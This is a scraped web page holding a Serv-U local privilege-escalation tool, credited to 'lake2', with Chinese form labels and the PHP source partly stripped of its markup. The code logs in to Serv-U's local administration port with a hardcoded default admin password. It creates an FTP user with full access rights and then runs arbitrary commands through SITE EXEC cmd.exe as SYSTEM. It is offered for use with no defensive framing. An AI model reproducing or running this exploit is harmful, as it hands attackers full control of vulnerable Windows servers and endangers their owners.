Serv-U Local Get SYSTEM Shell with ASP

Author: lake2, http://www.winshell.cn

user:
pwd :
port:
Add User Del User

Done!

Only for Enjoy&Challenge !

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ serv-u.php内容如下: Serv-U本地提升权限 坏狼网络
Serv-U本地提升权限 坏狼网络
提升权限部分
主机Ftp端口:
添加的用户名:
添加的用户名密码:
用户主目录(别忘了写"\"):
Serv-U本地提升权限 坏狼网络
执行命令部分
主机Ftp端口:
用户名:
用户名密码:
执行的命令:
\n"; } else { fputs ($fp, "USER LocalAdministrator\r\n"); sleep (1); fputs ($fp, "PASS #l@\$ak#.lk;0@P\r\n"); sleep (1); fputs ($fp, "SITE MAINTENANCE\r\n"); sleep (1); fputs ($fp, "-SETUSERSETUP\r\n"); fputs ($fp, "-IP=0.0.0.0\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, "-User=".$user."\r\n"); fputs ($fp, "-Password=".$password."\r\n"); fputs ($fp, "-HomeDir=".$homedir."\r\n"); fputs ($fp, "-LoginMesFile=\r\n"); fputs ($fp, "-Disable=0\r\n"); fputs ($fp, "-RelPaths=0\r\n"); fputs ($fp, "-NeedSecure=0\r\n"); fputs ($fp, "-HideHidden=0\r\n"); fputs ($fp, "-AlwaysAllowLogin=0\r\n"); fputs ($fp, "-ChangePassword=1\r\n"); fputs ($fp, "-QuotaEnable=0\r\n"); fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); fputs ($fp, "-SpeedLimitUp=-1\r\n"); fputs ($fp, "-SpeedLimitDown=-1\r\n"); fputs ($fp, "-MaxNrUsers=-1\r\n"); fputs ($fp, "-IdleTimeOut=600\r\n"); fputs ($fp, "-SessionTimeOut=-1\r\n"); fputs ($fp, "-Expire=0\r\n"); fputs ($fp, "-RatioUp=1\r\n"); fputs ($fp, "-RatioDown=1\r\n"); fputs ($fp, "-RatiosCredit=0\r\n"); fputs ($fp, "-QuotaCurrent=0\r\n"); fputs ($fp, "-QuotaMaximum=0\r\n"); fputs ($fp, "-Maintenance=System\r\n"); fputs ($fp, "-PasswordType=Regular\r\n"); fputs ($fp, "-Ratios=None\r\n"); fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n"); sleep (1); fputs ($fp, "-GETUSERSETUP\r\n"); fputs ($fp, "-IP=0.0.0.0\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, " User=".$user."\r\n"); sleep (1); fputs ($fp, "QUIT\r\n"); sleep (1); while (!feof($fp)) { echo fgets ($fp,128); } fclose ($fp); } } function ftpcmd($ftpport,$user,$password,$cmd){ $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30); if (!$conn_id) { echo "$errstr ($errno)
\n"; } else { fputs ($conn_id, "USER ".$user."\r\n"); sleep (1); fputs ($conn_id, "PASS ".$password."\r\n"); sleep (1); fputs ($conn_id, "SITE EXEC c:\\windows\\system32\\cmd.exe /c ".$cmd."\r\n"); fputs ($conn_id, "QUIT\r\n"); sleep (1); while (!feof($conn_id)) { echo fgets ($conn_id,128); } fclose($conn_id); } } ?>